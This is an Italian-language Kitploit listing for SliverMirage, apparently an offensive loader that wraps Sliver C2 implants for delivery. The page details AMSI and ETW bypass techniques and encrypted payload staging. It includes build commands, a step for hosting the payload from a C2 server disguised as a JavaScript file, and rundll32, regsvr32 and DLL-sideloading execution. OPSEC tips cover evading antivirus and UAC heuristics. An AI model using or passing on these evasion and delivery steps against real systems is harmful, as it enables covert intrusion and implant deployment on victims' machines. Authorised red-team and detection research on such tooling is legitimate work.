Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SliverMirage — Crystal Palace PICO loader per Sliver C2 bypass AMSI a doppio strato, silenziamento ETW, payload crittografati AES-256-CBC, 6 varianti di consegna | Kitploit
Strumenti/GitHubGitHub/daniomass/slivermirage
ExploitPost-ExploitAnalisi MalwareCommand and ControlAnalisi di BinariRed TeamingSviluppo Payload
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace PICO loader per Sliver C2 bypass AMSI a doppio strato, silenziamento ETW, payload crittografati AES-256-CBC, 6 varianti di consegna

Vedi Repository
1545 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SliverMirage

Un fork di CrystalSliver che estende il loader PICO di Crystal Palace con bypass AMSI a doppio strato, silenziamento ETW e sei varianti di consegna per Sliver C2.

Che cosa fa

SliverMirage avvolge una DLL dell'impianto Sliver tramite la virtualizzazione PICO di Crystal Palace, quindi la consegna tramite un loader che neutralizza AMSI ed ETW senza applicare patch a amsi.dll o ntdll.dll.

Stack di evasione:

LayerTecnicaDettaglio
AMSI L1Corruzione delle stringhe CLRLdrRegisterDllNotification intercetta il caricamento di clr.dll, corrompe AmsiScanBuffer in .rdata prima che CLR chiami GetProcAddress
AMSI L2VEH + HWBPIl Vectored Exception Handler su AmsiScanBuffer restituisce E_INVALIDARG
ETWHWBPDR1 su NtTraceControl, restituisce STATUS_SUCCESS
PayloadAES-256-CBC + XORDecrittazione BCrypt, VirtualAlloc(RW) -> VirtualProtect(RX), zero RWX
VirtualizzazioneCrystal Palace PICOLa DLL Sliver viene eseguita all'interno di un processo PICO, invisibile all'AV in userland

Varianti

FormatoFileConsegnaC2 a runtime?
exeEXE con stagingEXE + payload.dat sul sito C2Sì (HTTPS)
exe-stagelessEXE senza stagingSingolo EXENo
dllDLL senza stagingSingola DLLNo
dll-stagedDLL con stagingDLL + payload.dat sul sito C2Sì (HTTPS)
shellcodeShellcode con staging.bin + payload.datSì (HTTPS)
shellcode-stagelessShellcode senza stagingSingolo .binNo

Le varianti staged scaricano il PICO crittografato in runtime da un sito web HTTPS di Sliver. L'EXE/DLL è piccolo (~20 KB) e non contiene payload su disco.

Le varianti stageless incorporano il PICO crittografato in fase di compilazione (doppio strato XOR + AES). Più grandi su disco ma zero attività di rete prima della callback del beacon.

Avvio rapido

Prerequisiti

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 con pefile (pip install pefile)
  • openssl
  • Java 17 (per Crystal Palace — installato automaticamente da build.sh)

Build con build.sh (consigliato)

Lo script di build installa automaticamente le dipendenze mancanti (inclusi Crystal Palace e Java 17) e gestisce l'intera pipeline: DLL -> Crystal Palace PICO -> crittografia -> compilazione.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Opzioni:

  • --dll <path> — DLL dell'impianto Sliver (obbligatoria)
  • --host <ip> — IP del server C2 (obbligatorio per i formati staged)
  • --port <port> — Porta C2 (default: 443)
  • --path <path> — Percorso URL per il download del payload (default: /assets/js/vendor.js)
  • --format <fmt> — Formato di output (default: exe)
  • --export <name> — Nome export personalizzato della DLL

Build con Make (manuale)

Se hai già un blob PICO di Crystal Palace:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

Distribuzione

Staged (EXE o DLL)

  1. Carica build/payload.dat su un sito web HTTPS di Sliver:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Consegna build/csvchelper.exe (o .dll) al target.

Stageless

Consegna a file singolo. Nessuna configurazione del sito C2 necessaria.

Metodi di esecuzione della DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

In alternativa, usa il DLL sideloading (rinomina la DLL per corrispondere a una DLL legittima caricata dall'applicazione target).

Export: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Struttura del progetto

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

Note OPSEC

  • IAT pulito: solo kernel32, advapi32, bcrypt — tutte API Windows legittime
  • Nessuna patch in memoria: il bypass di AMSI/ETW usa hardware breakpoint, non VirtualProtect sulle DLL di sistema
  • Niente RWX: la memoria del payload passa da RW a RX, mai RWX
  • Sottosistema GUI: entry point WinMain, -mwindows — nessun flash della console
  • Version info + manifest: il manifest incorporato asInvoker sopprime le euristiche UAC
  • Controllo dell'entropia: i payload stageless usano una chiave XOR rolling per ridurre l'entropia da ~7.8 a ~6.0-6.5
  • Personalizza resource.rc / resource_dll.rc con la tua identità di copertura prima della build

Disclaimer

Questo progetto è destinato esclusivamente a test di sicurezza autorizzati, ricerca e scopi educativi. Usalo solo in ambienti in cui hai esplicita autorizzazione scritta per condurre test di penetrazione. L'accesso non autorizzato ai sistemi informatici è illegale. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo software.

Crediti

  • Crystal Palace di Rasta Mouse — motore di virtualizzazione PICO
  • CrystalSliver — integrazione originale di Crystal Palace + Sliver
  • sRDI di Nick Landers — tecnica di DLL injection riflessiva via shellcode

Licenza

MIT

Scarica lo strumento